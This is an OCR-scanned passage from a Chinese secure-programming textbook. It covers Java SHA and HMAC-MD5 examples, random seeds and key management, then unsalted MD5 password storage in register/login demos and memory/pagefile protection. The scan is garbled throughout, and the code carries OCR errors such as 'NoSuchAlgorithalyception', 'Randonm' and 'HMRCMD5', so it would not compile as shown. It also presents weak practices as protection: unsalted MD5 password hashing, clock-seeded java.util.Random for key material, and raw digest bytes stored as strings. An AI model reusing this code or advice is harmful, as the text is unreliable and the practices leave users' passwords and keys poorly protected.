catch( NoSuchAlgorithmException e) 
{ 

e. printStackTrace( ); 


} 


return null; 


} 


public static void main(String[ ] args) 

{ 
String msg =" 郭 克 华 _ 安 全 编程 技术 "; 
System. out. println(" 明 文 是 : ”+ msg); 


P12_05 p12 _05 = new P12_05(); 

byte[ ] resultBytes = pl2_05.encrypt(msg); 
String result = new String(resultBytes); 
System. out. println(" 密 文 是 : " + result); 
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复 运 行 , 效 果 一 样 。 
12.4.2 用 Java 实现 SHA 图 12-5 


安全 散 列 算法 (Secure Hash Algorithm,SHA) 是 NIST 发 布 的 国家 标准 ,一 般 称 
为 SHA-1, 该 算法 也 是 一 种 单 向 加 密 算法 ,输入 消息 的 长 度 不 超过 264 位 ,产生 160 位 
的 消息 摘要 输出 。 

以 下 代码 是 用 Java 语言 实现 SHA 算法 ,将 一 个 字符 串 “ 郭 克 华 _ 安 全 编程 技术 ” 进 
行 加 密 。 


P12_06. java 


import java. security. MessageDigest; 
import java. security. NoSuchAlgorithmException; 


public class P12_06 
{ 
// SHA 加密 
public static void main(String[ ] args) throws NoSuchAlgorithalyception 
{ 
try 
{ 
String msg =" 郭 克 华 _ 安全 编程 技术 "; 
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System. out.println(" 明 文 是 : ”+ msg); 
MessageDigest md5 = MessageDigest. getInstance("SHA"); 
byte[ ] srcBytes = msg.getBytes(); 
md5.update( srcBytes); 
byte[ ] resultBytes = md5. digest(); 
String result = new String(resultBytes); 
System. out. println(" 密 文 是 : ”+ result); 
} 
catch( NoSuchAlgorithmException e) 
{ 
e. printStackTrace( ); 
} 


运行 后 的 效果 如 图 12-6 所 示 。 
反复 运行 ,效果 一 样 。 在 读者 的 机 器 上 ,得 到 的 也 是 
相同 的 效果 。 


12.4.3 用 Java 实现 消息 验证 码 


单 向 加 密 的 结果 也 叫做 消息 摘要 ,因为 不 同 的 数据 加 密 得 到 的 结果 不 同 ,因此 可 以 
较 好 地 验证 数据 的 完整 性 。 利 用 MD5 算法 生成 消息 摘要 ,可 以 验证 数据 是 否 被 修改 ， 
方法 是 : 根据 收 到 的 数据 ,重新 利用 MD5 算法 生成 摘要 ,和 原来 的 摘要 相 比 较 ,如 果 相 
同 ,说 明 数据 没有 被 修改 ,反之 ,说 明 数 据 被 修改 了 。 

但 是 ,这 无 法 完全 阻止 数据 的 修改 。 如 果 在 数据 传递 过 程 中 ,窃取 者 将 数据 窃取 出 
来 ,并 且 修 改 数据 ,再 重新 生成 一 次 摘要 ,将 改 后 的 数据 和 重新 计算 的 摘要 发 送 给 接收 
者 ,接收 者 利用 算法 对 修改 过 的 数据 进行 验证 时 ,生成 的 消息 摘要 和 收 到 的 消息 摘要 仍 
然 相 同 , 消 息 被 判断 为 没有 被 修改 "。 这 是 一 个 安全 隐患 。 

因此 ,为 了 确保 安全 性 ,有 时 除了 需要 知道 消息 和 消息 摘要 之 外 ,还 需要 知道 发 送 
者 身份 ,本 节 所 讲解 的 消息 验证 码 ,在 一 定 程度 上 可 以 实现 这 个 功能 ,以 保证 安全 性 。 

消息 验证 码 和 MD5/SHA1 算法 不 同 的 地 方 是 : 在 生成 摘要 时 ,发 送 者 和 接收 者 
都 拥有 一 个 共同 的 密 钥 。 这 个 密 钥 可 以 是 通过 对 称 密码 体系 生成 的 ,事先 被 双方 共有 ， ， 
在 生成 消息 验证 码 时 ,还 必须 要 有 密 钥 的 参与 。 只 有 同样 的 密 钥 才能 生成 同样 的 消息 
验证 码 。 

Java 里 面 可 以 较 好 地 完成 这 个 功能 。 以 下 代码 是 用 Java 语言 实现 HMAC/MD5 
算法 ,将 一 个 字符 串 “ 郭 克 华 _ 安 全 编程 技术 ”进行 加 密 。 

P12_07. java 


C: \PROGEA~1\XINOKS~1\JCREAT™| 
E 


import javax. crypto. KeyGenerator; 
import javax. crypto. Mac; 

import javax. crypto. SecretKey; 

import javax. crypto. spec. SecretKeySpec; 


public class P12_07 
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public static void main(String[ ] args) 


// 要 计算 消息 验证 码 的 字符 串 
String str= " 郭 克 华 _ 安 全 编程 技术 "; 
System. out. println(" 明 文 是 :" + str); 
try 
! 
// 用 DES 算法 得 到 计算 验证 码 的 密 钥 
KeyGenerator keyGen = KeyGenerator. getInstance( "DESede" ) ; 
SecretKey key = keyGen. generateKey( ); 
byte[ ] keyByte = key. getEncoded( ); 


// 生成 MAC 对 象 

SecretKeySpec SKS = new SecretKeySpec(keyByte, "HMRCMD5" ) ; 
Mac mac = Mac. getInstance( "HMACMD5" ); 

mac. init(SKS); 


// 输入 要 计算 验证 码 的 字符 串 
mac. update( str. getBytes( "UTF8")); 


// 计算 验证 码 
byte[ ] certifyCode = mac. doFinal(); 
System. out. println(" 密 文 是 :" + new String(certifyCode)); 
} 
catch (Exception e) 
{ 
e.printStackTrace( ); 
} 
} 
} 


运行 后 的 效果 如 图 12-7 所 示 。 

注意 ,该 程序 反复 运行 .效果 不 一 样 , 在 读者 的 机 器 
上 ,结果 和 本 书 中 也 会 有 所 不 同 ,因为 每 次 生成 的 DES 
密 钥 不 一 样 。 

国 9 在 实际 操作 的 过 程 中 ,为 了 保证 双方 得 到 的 是 相同 

的 密 钥 ,DES 密 钥 是 保存 在 文件 中 或 者 数据 库 中 ,然后 从 其 中 取出 ,这 样 可 以 保证 得 到 
的 消息 摘要 是 一 样 的 。 敌 方 即使 得 知 了 消息 本 身 ,但 是 由 于 得 不 到 密 钥 , 也 无 法 生成 正 
确 的 消息 验证 码 。 敌 方 算 改 过 的 数据 在 验证 时 将 无 法 通过 。 


12.5 密 钥 安全 


从 前 面 的 例子 可 以 看 出 ,对 称 和 非 对 称 加 密 系统 的 安全 工作 ,依赖 于 两 个 方面 : 加 
密 算法 和 密 钥 。 一 般 情况 下 ,加 密 算法 都 是 公开 的 ,所 以 ,加 密 系 统 的 安全 性 依赖 于 密 
钥 的 安全 。 一 般 说 来 ,好 的 密 钥 应 该 满足 以 下 特性 : 
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(1) 不 同情 况 下 生成 的 密 钥 应 是 独立 的 、 互 不 相关 的 , 即 每 次 生成 的 密 钥 和 其 他 密 
(2) 密 钥 值 应 是 不 可 预测 的 。 

(3) 密 钥 值 在 某 个 范围 内 实现 均匀 分 布 。 
本 节 主 要 针对 密 钥 安 全 进行 曾 述 。 


12.5.1 随机 数 安全 


实现 密 钥 的 以 上 特点 ,随机 数 起 到 了 很 大 的 作用 。 随 机 数 生成 是 许多 加 密 操作 不 
可 分 割 的 组 成 部 分 ,常常 被 用 作 密 钥 的 生成 。 同 理 , 随 机 数 也 应 有 3 个 特性 : 

(1) 均匀 分 布 ; 

(2) 数值 不 可 预测 ; 

(3) 互 不 相关 。 

如 果 达 不 到 这 几 个 特性 ,随机 数 就 认为 是 不 良 的 ,对 系统 的 安全 性 会 产生 巨大 的 
影响 。 

产生 随机 数 , 有 多 种 不 同 的 方法 。 这 些 方法 被 称 为 随机 数 发 生 器 ,基本 上 所 有 的 高 
级 语言 都 封装 了 随机 数 发 生 器 。 


提示。 需要 指出 的 是 ,真正 的 随机 数 是 使 用 物理 现象 产生 的 四， 比如 掷 钱币 、 朋 
耶 、 使 用 电子 元 件 的 嗓音 、 核 裂变 等 。 这 样 的 随机 数 发 生 器 叫做 物理 性 随机 数 发 生 器 ， 
它们 的 缺点 是 技术 要 求 较 高 。 计 算 机 不 会 产生 绝对 随机 的 随机 数 。 


一 般 情况 下 ,计算 机 只 能 产生 “ 伪 随 机 数 ”。 

伪 随 机 数 中 的 * 伪 ”, 并 不 是 说 数 不 随 机 ,而 是 计算 机 产生 的 伪 随 机 数 既是 随机 的 又 ， 
是 有 规律 的 中 。 即 产生 的 伪 随 机 数 有 时 遵守 一 定 的 规律 ,有 时 不 遵守 任何 规律 ; 伪 随 
机 数 有 一 部 分 遵守 一 定 的 规律 ; 另 一 部 分 不 遵守 任何 规律 。 不 过 ,这 里 的 有 规律 并 
不 是 说 随机 数 能 够 被 预测 。 

产生 随机 数 的 方法 有 很 多 ,如 迭代 取 中 法 、 同 余 法 等 。 关 于 底层 的 实现 ,读者 可 以 
参考 相关 资料 。 | 

计算 机 中 随机 数 一 般 由 “随机 种 子 ”产生 ,随机 种 子 是 用 来 产生 随机 数 的 一 个 数 ,在 
计算 机 中 ,这 样 的 一 个 “随机 种 子 ” 是 一 个 无 符号 整数 。 这 个 种 子 本 身 应 该 是 随机 的 , 因 
为 随机 数 是 由 随机 种 子 根据 一 定 的 计算 方法 计算 出 来 的 数值 ,只 要 计算 方法 一 定 , 随 机 
种 子 一 定 , 那 么 产生 的 随机 数 就 不 会 变 。 和 否则 ,就 很 容易 通过 随机 数 生成 算法 来 得 知 随 
机 数 的 值 。 

看 下 面 这 个 Java 程序 : 


P12_08. java 


import java. util. Random; 
public class P12 _ 08 { 
public static void main(String[ ] args) 
{ 
long seed= 5; 
Random rnd = new Randonm(); 


再 软件 要 全 实现 一 “安全 编程 技术 
rnd. setSeed( seed) ; 
System. out. println(rnd. nextInt()); 


System. out. println(rnd. nextInt()); 
System. out. println(rnd. nextInt()); 


运行 后 的 结果 如 图 12-8 所 示 。 
per 再 次 运行 ,可 发 现 ,打印 的 结果 一 样 。 在 相同 的 平台 环境 下 ,每 
-1157498321 次 运行 它 , 显 示 的 随机 数 都 是 相同 的 。 
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7996634 这 是 因为 ,在 相同 的 编译 平台 环境 下 ,由 随机 种 子 生成 随机 数 的 
12.8 ”计算 方法 都 是 一 样 的 ,再 加 上 随机 种 子 一 样 ,所 以 产生 的 随机 数 就 是 
一 样 的 。 


解决 这 个 问题 的 方法 是 : 可 以 设 定 一 个 随机 种 子 来 产生 随机 数 。 以 下 内 容 可 以 帮 
设置 种 子 ， 

。 系统 时 钟 ; 

。 底层 系统 信息 ,如 空闲 进程 时 间 IO 读 写 计 数 等 ; 

。 环境 信息 ,如 CPU 的 温度 ,等 等 。 

在 文献 中 一 书 中 ,作者 列举 了 Windows 中 的 CryGenRandom() 函 数 ,并 通过 例子 ， 
说 明 这 个 随机 数 生成 器 比 rand() 函 数 更 加 健壮 , 它 可 以 从 系统 的 众多 资源 中 获取 种 子 
的 随机 性 。 有 兴趣 的 读者 可 以 参考 相关 文献 。 

以 Java 为 例 ,以 上 代码 可 改 为 下 列 情形 : 


P12_09. java 


import java. util. Date; 
import java. util. Random; 
public class P12_09 
{ 
public static void main(String[ ] args) 
{ 
long seed = new Date().getTime(); 
Random rnd = new Random( ) ; 
rnd. setSeed( seed); 
System. out. println(rnd. nextInt()); 
System. out. println(rnd. nextInt()); 
System. out. println(rnd. nextInt()); 
} 
} 


本 程序 中 ,利用 系统 时 间作 为 种 子 ,运行 后 产生 的 随机 数 如 
图 12-9 所 示 。 


901968888 
重新 运行 ,结果 不 一 样 。 这 里 用 户 使 用 系统 时 间 的 值 作为 随机 ” 世 [ 坟 2 


种 子 , 由 于 系统 时 间 对 应 的 数值 是 不 断 变化 的 ,所 以 ,在 相同 的 平台 EE sse 
环境 下 ,每 次 运行 它 ,显示 的 随机 数 结果 会 有 不 同 。 不 过 ,值得 一 提 。 图 12-9 


第 12 章 ”数据 的 加 密 保 护 


学 
的 是 ,这 里 产生 的 随机 数 是 伪 随机 数 (为 什么 ? 请 读者 自己 思考 )。 

在 Java 中 ,如 果 用 户 或 第 三 方 不 设置 随机 种 子 ,那么 在 默认 情况 下 随机 种 子 来 自 
系统 时 钟 。 如 下 代码 


Random rnd = new Random(); 

System. out. println(rnd. nextInt()); 
System. out. println(rnd. nextInt()); 
System. out. println(rnd. nextInt()); 


每 次 运行 产生 的 随机 数 也 会 不 一 样 。 
但 是 ,其 他 语言 中 可 能 不 是 这 样 ,比如 VB 中 ,需要 用 Randomize() 函数 来 首先 设 
置 一 下 随机 种 子 , 否 则 系统 无 法 得 到 伪 随 机 数 。 


12. 5.2 密 钥 管理 安全 


密 钥 管理 是 一 件 很 复杂 的 事情 ,从 密 钥 的 产生 到 密 钥 的 销毁 的 各 个 方面 都 需要 考 | 
虑 。 主 要 表现 于 ， | 

。 密 钥 的 管理 体制 ; 

。 密 钥 的 管理 协议 ; 

。 密 钥 产生 产生 分配、 销毁 ,等 等 。 

由 于 不 同 的 加 密 体系 , 密 钥 产生 之 后 的 使 用 方法 各 不 相同 。 如 对 称 加 密 体系 中 , 双 
方 密 钥 必须 相同 ; 非 对 称 加 密 体系 中 , 公 钥 私 钥 要 成 对 出 现 ,因此 ,本 节 从 各 种 加 密 方 
法 进行 讲解 。 | 

(1) 对 称 加 密 体系 中 的 密 钥 管理 。 对 称 加密 体 系 中 ,采用 对 称 加 密 技术 的 通信 双 
方 必须 要 保证 采用 的 是 相同 的 密 钥 ,由 于 密 钥 双方 都 需要 知道 ,因此 只 能 通过 秘密 的 方 
法 传送 。 这 就 为 密 钥 的 传递 带 来 了 风险 .必须 保证 彼此 密 钥 的 交换 是 安全 可 靠 的 ,主要 
是 防止 密 钥 泄 露 或 者 被 敌 方 更 改 。 因 此 ,对 称 密 钥 的 管理 和 分 发 工作 是 一 件 很 有 风险 
的 事情 。 

解决 这 个 问题 的 方法 一 般 是 : 通过 非 对 称 密码 体系 来 对 对 称 密 钥 进行 管理 (采用 
该 方法 的 一 个 原因 是 由 于 非 对 称 密码 体系 适合 对 少量 数据 进行 加 密 解密 ) 。 具 体 过 程 
如 下 (为 描述 简便 ,此 处 只 涉及 到 密 钥 ,没有 涉及 到 被 加 密 的 数据 信息 ,实际 上 ,被 加 密 
的 数据 信息 也 存在 于 通信 的 过 程 中 ): 

。 发送 方 生 成 对 称 密 钥 , 将 其 用 接收 方 的 公开 密 钥 加 密 ,发 出 ; 

。 接 收 方 用 自己 的 私 钥 将 加 密 后 的 对 称 密 钥 解密 ,得 到 对 称 密 钥 。 

由 于 对 每 次 信息 发 送 和 接收 ,都 对 应 了 唯一 一 个 对 称 密 钥 , 因 此 双方 不 需要 对 密 钥 
进行 维护 ,另外 .即使 泄露 了 密 钥 , 敌 方 也 无 法 知道 密 钥 的 内 容 , 因 为 他 不 知道 接收 方 的 
私人 密 钥 ,无 法 对 对 称 密 钥 进行 解密 。 

这 种 方式 使 得 管理 相对 简单 和 安全 ,同时 ,该 方法 还 解决 了 对 称 密 钥 中 存在 的 密 钥 
自 改 问题 。 

(2) 非 对 称 加 密 体系 中 的 密 钥 管理 。 在 该 体系 中 ,主要 涉及 的 是 公开 密 钥 管理 。 
一 般 情况 下 ,通信 双方 间 可 以 使 用 数字 证 书 (公开 密 钥 证 书 ) 来 交换 公开 密 钥 。 
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国际 电信 联盟 (ITU) 制 定 的 标准 X. 509, 对 数字 证 书 进行 了 定义 ,利用 数字 证 书 ， 
可 以 确定 如 下 内 容 : 

。 证书 所 有 者 名 称 ; 

。 证 书 发 布 者 的 名 称 ; 

。 证 书 所 有 者 的 公开 密 钥 ; 

。 证 书 发 布 者 的 数字 签名 ; 

。 证书 的 有 效 期 及 证 书 的 序列 号 ,等 等 。 

证 书 发 布 者 一 般 都 是 证 书 管理 机 构 (CA) , 它 是 通信 各 方 都 信赖 的 机 构 。 关 于 数字 


。 证 书 的 相关 知识 ,读者 可 以 参考 相关 文献 。 


近年 来 ,还 出 现 了 一 些 密 钥 管理 芯片 。 密 钥 管理 芯片 是 专门 为 嵌入 式 程 序 的 防 攻 


击 , 以 及 密 钥 管理 而 设计 的 新 一 代 加 密 芯 片 。 可 用 于 消费 类 电子 产品 如 视频 处 理 板 卡 


的 数据 流 加 密 解密 、 游 戏 机 板 、 路 由 器 ,机顶盒 等 。 由 于 其 加 密 解 密 速度 较 快 ,也 得 到 了 


”较为 广泛 的 应 用 。 


小 结 


本 章 首先 讲解 了 加 密 的 意义 ,然后 介绍 了 常见 的 3 种 加 密 体系 中 的 一 些 算法 : 对 


称 加 密 体系 中 的 DES、3DES、AES 算法 ; 非 对 称 加 密 体系 中 的 RSA、DSA 算法 ; 单 向 


| 特点。 


加 密 中 的 MD5、SHA 算法 。 每 一 种 算法 ,基于 Java 语言 进行 了 实现 ,并 分 析 了 它们 的 
由 于 加 密 算 法 通常 是 公开 的 ,加 密 系 统 的 安全 性 决定 于 密 钥 的 隐 项 性 ,因此 , 密 钥 


安全 是 加 密 系统 中 的 重要 工作 。 本 文 在 后 面 的 篇 幅 中 ,讲解 了 密 钥 安全 中 的 两 个 问题 : 
随机 数 和 密 钥 管理 。 


练 习 


1. 对 称 加 密 体系 具有 较为 广泛 的 应 用 。 任 写 一 个 文本 文件 ,将 其 内 容 用 DES、 


”AES 方式 加 密 然后 解密 。 


2. 非 对 称 加 密 体系 和 对 称 加 密 体系 相 比 ,具有 自己 的 优势 。 任 写 一 个 文本 文件 ， 


。 将 其 内 容 用 RSA 方法 加 密 然后 解密 。 


3. 单 向 加 密 算 法 不 需要 密 钥 ,在 数据 认证 方面 具有 较为 广泛 的 应 用 。 任 写 一 个 文 
本 文件 ,将 其 内 容 用 MD5 算法 进行 加 密 ,然后 修改 这 个 文本 文件 ,再 加 密 , 比 较 两 次 的 
密 文 。 

4. 编写 一 个 “软件 加 密 器 ”: 打开 一 个 Java 界面 ,必须 首先 选择 一 个 破解 文件 ,如 


。 果 能 够 找到 正确 的 破解 文件 ,该 Java 界面 才能 打开 否则 提示 : 软件 没有 破解 ,无 法 使 
。 用 某 些 功能 。 


5. 查询 相关 资料 ,了 解 DES 算法 的 内 部 原理 ,用 C 语言 实现 DES 加 密 算 法 和 解 
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加 | 
密 算法 。 


6. 请 查找 关于 “中 国 山东 大 学 王小云 教授 破解 MD5 算法 ”的 报道 ,了 解 以 下 问题 : 

(1) 这 里 的 “破解 ”是 什么 含义 ? 

(2) 是 否 可 以 说 明 , 可 以 由 明文 推测 出 密 文 或 者 密 文 推测 出 明文 ? 

7. 消息 验证 码 和 普通 的 单 向 加 密 , 都 可 以 生成 消息 摘要 进行 消息 认证 ,请 比较 两 
者 有 何不 同 ? 

8. 对 称 密码 中 , 密 钥 的 安全 性 表现 在 哪些 方面 ? 

9. 为 什么 说 计算 机 生成 的 随机 数 是 伪 随 机 数 ? 

10. 非 对 称 密 码 体系 中 ,怎样 进行 密 钥 管理 ? 
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am mo ec 一 


第 章 


数据 的 其 他 保护 


前 述 章 节 讲 解 了 通过 将 数据 进行 加 密 来 保护 数据 的 方法 ,此 类 方法 可 以 得 到 良好 
的 效果 。 但 是 ,由 于 数据 加 密 算 法 所 需要 占用 资源 ,不 是 任何 情况 下 都 需要 用 数据 加 密 
来 保护 数据 ,并 且 由 于 加 密 解 密 算 法 本 身 的 复杂 度 , 育 目 将 数据 通过 加 密 来 进行 保护 ， 
有 可 能 会 降低 系统 的 运行 速度 。 因 此 ,不 用 加 密 方法 来 进行 的 数据 保护 ,也 具有 较 好 的 
应 用 背景 。 并 且 由 于 应 用 的 不 同 , 某 些 项 目 中 可 能 对 数据 加 密 具 有 另外 的 使 用 方式 ,如 
软件 注册 码 的 生成 等 。 

本 章 针 对 几 种 不 需要 数据 加 密 的 场合 进行 讲解 。 本 章 内 容 涵盖 密码 保护 、 内 存 数 
据 保 护 ,注册 表 保 护 、 数 字 水 印 和 软件 版 权 保护 等 方面 的 知识 。 

应 该 注意 的 是 ,本 章 内 容 是 从 另 一 个 角度 阅 述 数据 加 密 之 外 的 其 他 数据 保护 方法 ， 
其 中 也 可 能 用 到 一 些 密码 学 的 技术 ,只 是 不 是 纯粹 将 数据 进行 加 密 。 


13.1 数据 加 密 的 限制 


数据 加 密 在 数据 保护 中 可 以 起 到 很 重要 的 作用 。 但 是 ,很 多 应 用 中 ,数据 加 密 并 不 
是 保护 数据 的 唯一 方法 ,一 般 说 来 ,数据 加 密 的 如 下 特点 ,可 能 会 给 数据 保护 带 来 副 
作用 : 

(1) 数据 加 密 必 须要 将 数据 用 加 密 算法 进行 处 理 . 不 管 是 对 称 密码 体系 还 是 非 对 
称 密码 体系 ,算法 复杂 度 都 较 高 ,如 果 数 据 量 大 ,所 花 的 时 间 较 多 ,在 有 些 需要 迅速 响应 
的 实时 系统 中 ,不 太 适 合 。 

(2) 除了 单 向 加 密 方 法 之 外 ,其 他 常见 的 加 密 算法 都 需要 保存 密 钥 , 密 钥 的 保存 除 
了 额外 消耗 空间 之 外 ,也 增加 了 数据 本 身 对 外 界 的 依赖 性 ,如 果 密 钥 被 破坏 ,数据 将 面 
临 无 法 解密 的 可 能 。 

另外 ,在 实际 项 目 开发 中 ,由 于 一 些 原因 ,应 用 的 场合 所 需要 的 数据 保护 不 仅仅 是 
简单 的 加 密 , 如 : 

。 希望 内 存 数据 不 被 存 人 硬盘 之 后 被 窃取 ; 
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。 和 希望 注册 表 能 够 应 付 敌 方 修改 攻击 ; 
。 和 硕 望 作品 保证 自己 的 版 权 ; 

。 希望 软件 只 能 被 授权 的 人 使 用 ,等 等 。 
都 不 是 简单 通过 加 密 解密 能 够 实现 的 。 


13.2 密码 保护 与 验证 


很 多 系统 中 都 涉及 到 存储 用 户 密码 。 怎 样 将 密码 存储 到 数据 库 中 ? 如 果 以 纯 文 本 
的 方式 存储 ,势必 会 遇 到 危险 。 如 数据 库 中 有 一 个 表格 ,结构 如 表 13-1 所 示 。 


表 13-1 T_CUSTOMER 


ACCOUNT( 主 键 ) | PASSWORD CNAME 


打开 这 个 表格 ,看 到 如 图 13-1 所 示 的 结果 。 


图 13-1 


密码 能 够 以 明文 形式 被 看 到 ,很 明显 ,如 果 攻 击 者 取得 了 管理 员 权限 ,或 者 攻击 者 
本 身 就 是 管理 员 , 就 可 以 看 到 用 户 密码 。 因 此 ,密码 保护 显得 非常 重要 。 

密码 保护 的 目标 是 : 让 密码 以 他 人 看 不 懂 的 形式 存 人 数据 库 。 一 般 的 方法 是 为 密 
码 生 成 一 个 唯一 对 应 的 摘要 ,也 可 以 理解 为 密 文 , 存 和 人 数据库; 用 户 登录 验证 时 ,再 根 
据 密码 生成 摘要 ,和 数据 库 中 的 摘要 比 对 验证 。 很 显然 ,上 一 章 中 的 “ 单 向 加 密 算法 ”就 


可 以 完成 这 个 功能 。 


3 提示 “本 节 内 容 实际 上 是 单 向 加 密 的 一 种 应 用 ,但 是 由 于 其 在 密码 保护 方面 应 
用 较 广 ,特别 归纳 为 “数据 的 其 他 保护 ”范畴 。 


如 前 所 述 , 单 向 加 密 算法 的 特点 是 : 

。 同样 的 明文 生成 的 密 文 (摘要 ) 相 同 ; 

。 无 法 由 摘要 推测 明文 。 

单 向 加 密 算法 有 MD5 、SHA 等 。 

本 节 利 用 Java 语言 ,配合 MD5 完成 这 个 功能 。 首 先 建立 一 个 数据 库 ,在 数据 库 中 
建立 T_CUSTOMER 表格 ,然后 配置 数据 库 连 接 , 本 章 使 用 Microsoft SQL Server， 
ODBC 桥接 ,数据 源 名 称 为 CustomerDs。 该 项 工作 中 ,数据 库 建 立 和 ODBC 连接 建 
立 , 大 家 可 以 参考 相应 文档 。 

首先 是 由 密码 明文 生成 MD5 消息 摘要 的 代码 : 
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MD5. java 


import java. security. MessageDigest; 


public class MD5 


{ 


public static String generateCode( String str) throws Exception{ 


MessageDigest md5 = MessageDigest.getInstance("MD5"); 
byte[ ] srcBytes = str.getBytes(); 

md5. update( srcBytes); 

byte[ ] resultBytes = md5.digest(); 

String result = new String(resultBytes); 

return result; 


用 一 个 Java 程序 来 模拟 注册 界面 : 


Register. java 


import java. io. BufferedReader; 


import java. io. InputStreamReader; 


import java. sql. Connection; 
import java. sql. DriverManager; 
import java. sql. PreparedStatement; 


public class Register 


{ 


public static void main(String[ ] args) throws Exception 


| 


InputStreamReader isr = new InputStreamReader(System. in); 
BufferedReader br = new BufferedReader(isr); 
System. out. print(" 请 您 输入 账号 :"); 
String account = br.readLine(); 
System. out. print(" 请 您 输入 密码 :"); 
String password = br.readLine(); 
System. out. print(" 请 您 输入 姓名 :"); 
String cname = br.readLine(); 
password = MD5. generateCode(password) ;// 将 密码 转换 成 密 文 
Class. forName("sun. jdbc. odbc. JdbcOdbcDriver" ); 
Connection conn = 
DriverManager. getConnection( "jdbc:odbc:CustomerDs", "",""); 
String sql = "INSERT INTO T_CUSTOMER VALUES(?,?,?)"; 
PreparedStatement ps = conn.prepareStatement(sql); 
ps. setString(1, account); 
ps. setString(2, password); 
ps. setString(3, cname); 
ps. execute( ); 
ps.close(); 
conn. close( ); 
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运行 该 程序 ,输入 账号 、 密 码 和 姓名 如 图 13-2 所 示 。 


回 车 ,得 到 结果 ,在 数据 库 中 可 以 看 到 ,密码 完全 以 密 文 显示 ,如 图 13-3 所 示 。 


PROGRA~1\IINOXS 1 JC) 
帐号 :457895 


457695 


至 码 :19899914 
站 名 :guokehua 


用 一 个 Java 程序 来 模拟 登录 界面 : 


Login. java 


import java. io. BufferedReader; 
import java. io. InputStreamReader; 
import java. sql. Connection; 

import java. sql. DriverManager; 
import java. sql. PreparedStatement; 
import java. sql. ResultSet; 


public class Login 


{ 


t 


public static void main(String[ ] args) throws Exception 


InputStreamReader isr = new InputStreamReader(System. in); 
BufferedReader br = new BufferedReader(isr); 

System. out. print(" 请 您 输入 账号 :"); 

String account = br.readLine(); 

System. out. print(" 请 您 输入 密码 :"); 

String password = br.readLine(); 

password = MD5.generateCode(password) ;// 将 密码 转换 成 密 文 
Class. forName( "sun. jdbc. odbc. JdbcOdbcDriver" ); 

Connection conn = 


DriverManager. getConnection( "jdbc:odbc:CustomerDs","",""); 


String sql = "SELECT x FROM T_ CUSTOMER" 

+ ”WHERE ACCOUNT = ? AND PASSWORD = ?"; 
PreparedStatement ps = conn. prepareStatement(sql); 
ps. setString(1, account); 
ps. setString(2, password); 

ResultSet rs = ps.executeQuery(); 
if(rs. next()) 
{ 
System. out. println( "欢迎 " 
+ rs.getString("CNAME"). trim() 
+ "登录 !"); 
} 
else 
{ 
System. out. println(" 登 录 失败 !"); 
} 
rs.close(); 
ps.close(); 
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conn. close( ); 


} 


输入 正确 的 值 ,显示 如 图 13-4 所 示 。 
输入 错误 的 值 ,显示 如 图 13-5 所 示 。 


ET C: PROGRA~1\XINOXS~1%TN 
\ 帐 号 :457895 
全 畏 入 密码 :19899914 
欢迎 guokehua 登 录 ! 


请 账号 :457895 
i 3:19880414 


13-4 图 13-5 


显然 ,数据库 管理 员 无 法 得 知 密码 原文 。 当 用 户 忘 记 密码 时 ,可 以 向 管理 员 申 请 修 
改 密码 ,但 是 无 法 让 管理 员 告 知 其 密码 。 


13.3 ”内存 数据 的 保护 


通常 ,在 编程 的 过 程 中 ,比较 受到 重视 的 是 硬盘 上 数据 安全 的 问题 ,因为 硬盘 上 的 
数据 一 般 以 文件 的 形式 存在 ,受到 攻击 的 可 能 性 比较 大 ; 但 是 ,内 存 中 的 数据 安全 同样 
不 可 忽视 ,特别 是 需要 重视 保护 内 存 中 的 敏感 数据 ,如 密码 和 密 钥 。 

从 安全 学 的 一 般 意义 上 来 讲 , 针 对 敏感 数据 的 安全 性 主要 体现 在 两 个 方面 : 

(1) 避免 敏感 数据 的 泄露 ; 

(2) 防止 敏感 数据 被 破坏 。 

为 了 保证 内 存 中 数据 的 安全 ,一 般 采用 的 策略 是 : 使 敏感 数据 在 内 存 中 保留 的 时 
间 尽 可 能 地 短 ,并 应 尝试 确保 该 数据 从 不 写 人 硬盘 。 

该 策略 描述 起 来 很 简单 ,但 是 实现 起 来 具有 一 定 技巧 。 本 节 从 几 个 方面 阐述 内 存 
数据 保护 的 方法 。 


13.3.1 避免 将 数据 写 入 硬盘 文件 


很 多 情况 下 ,内 存 数 据 有 可 能 和 硬盘 数据 进行 交换 。 如 果 内 存 数 据 写 到 硬盘 ,安全 
威胁 将 大 大 加 强 。 因 为 攻击 硬盘 文件 有 很 多 方法 ,其 攻击 的 难度 比 攻击 内 存 数 据 本 身 
小 得 多 。 

内 存 的 数据 和 硬盘 数据 在 什么 情况 下 会 进行 交换 呢 ? 通常 情况 下 ,由 于 内 存 容量 
(一 般若 干 G) 无 法 和 硬盘 (一 般 数 十 G) 相 提 并 论 ,理论 上 说 ,硬盘 中 的 所 有 内 容 都 可 以 


放 到 内 存 中 运行 。 当 有 限 的 内 存 要 运行 大 量 的 程序 时 ,为 了 保证 空间 足够 ,就 将 内 存 中 


一 些 暂 时 不 用 的 数据 放 到 硬盘 中 , 换 句 话说 ,就 是 将 一 部 分 硬盘 当 内 存 用 ; 当 存 放 在 硬 
盘 中 的 那 部 分 数据 需要 使 用 时 ,又 从 硬盘 中 调 出 , 放 入 内 存 。 一 般 情况 下 ,这 片 当成 内 


。 存 使 用 的 硬盘 空间 叫做 虚拟 内 存 。 


很 多 操作 系统 中 ,存在 着 内 存 数据 与 硬盘 交换 的 文件 (或 者 交换 分 区 ) ,该 文件 大 小 
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可 以 进行 设置 ,但 是 该 文件 不 能 删除 ,这 种 文件 叫做 “虚拟 内 存 文件 ”, 其 作用 就 是 拿 一 
部 分 的 硬盘 空间 来 当 作 内 存 使 用 , 先 把 内 存 中 一 些 闲 置 太 久 的 数据 存 到 硬盘 上 , 腾 出 内 
存 空间 给 其 他 程序 使 用 ,原先 数据 需要 用 的 时 候 再 从 “虚拟 内 存 文件 ”内 调 出 。 

以 Windows 操作 系统 为 例 , 在 Windows 中 ,可 以 在 “我 的 电脑 ”一 “属性 ”一 “高 
级 ”一 性 能 “设置 ">“ 性 能 选项 ”>“ 高 级 ”中 进行 设置 ,如 图 13-6 所 示 。 

3k| 


驱动 器 [ 卷 标 ] 中) 页 面 文件 大 小 0B) 


图 13-6 


系统 运行 的 过 程 中 ,在 系统 盘 根 目录 (如 C:\) 下 出 现 一 个 文件 ,大 小 经 常 发 生变 
动 , 这 就 是 Windows 的 “虚拟 内 存 文件 ”, 通 常 名 为 pagefile. sys。 如 果 对 “虚拟 内 存 文 
件 " 设 置 得 当 , 对 机 器 的 性 能 会 有 一 定 程度 的 提高 。 

